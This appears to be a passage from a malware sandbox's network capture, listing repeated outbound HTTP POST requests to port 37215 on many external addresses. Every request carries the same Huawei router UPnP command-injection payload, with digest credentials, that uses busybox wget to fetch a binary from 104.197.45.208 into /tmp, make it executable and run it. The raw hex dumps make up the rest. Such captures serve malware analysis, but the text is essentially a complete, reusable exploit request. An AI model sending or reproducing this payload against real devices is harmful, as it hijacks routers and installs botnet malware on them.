                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            46192.168.2.145151241.17.37.24137215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.661829948 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            47192.168.2.144543841.103.250.337215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.661854982 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            48192.168.2.1451424156.92.179.21237215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.661880016 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            49192.168.2.1449176156.75.157.21337215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.661885023 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            50192.168.2.1446274197.143.65.5637215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.661950111 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            51192.168.2.1446970156.54.177.9037215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.661972046 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            52192.168.2.1450488197.1.228.18537215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.661973000 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            53192.168.2.143574041.48.170.20137215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.662002087 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            54192.168.2.1452952197.33.230.7137215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.662023067 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            55192.168.2.1458554156.129.96.20637215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.662043095 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
